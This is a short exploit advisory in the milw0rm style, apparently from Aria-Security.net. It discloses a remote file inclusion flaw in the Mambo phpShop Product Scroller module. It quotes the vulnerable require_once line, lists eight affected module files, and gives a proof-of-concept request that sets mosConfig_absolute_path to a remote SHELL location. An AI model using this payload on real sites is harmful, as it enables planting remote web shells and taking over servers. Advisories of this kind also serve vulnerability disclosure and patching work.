|
|
###########################################################################################=0D
# Aria-Security.net Advisory #=0D
# Discovered by: O.U.T.L.A.W # =0D
=0D
# < www.Aria-security.net > #=0D
# Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp #=0D
# #=0D
###########################################################################################=0D
#Software: mambo-phphop Product Scroller Module =0D
#Attack method: Remote File Inclusion=0D
=0D
#Source:=0D
=0D
/* Load the phpshop main parse code */=0D
require_once( $mosConfig_absolute_path.'/components/com_phpshop/phpshop_parser.php' );=0D
=0D
=0D
************************************************************************************=0D
=0D
#Vulnarable Files:=0D
mod_phpshop.php=0D
mod_phpshop_allinone.php=0D
mod_phpshop_cart.php=0D
mod_phpshop_featureprod.php=0D
mod_phpshop_latestprod.php=0D
mod_product_categories.php=0D
mod_productscroller.php=0D
mosproductsnap.php=0D
=0D
=0D
#Proof of Concept: =0D
#one of the files above.php?mosConfig_absolute_path=SHELL=0D
# =0D
#---------------------------------------------------------- =0D
# =0D
=0D
=0D
# =0D
#Contact : Outlaw@aria-security.net =0D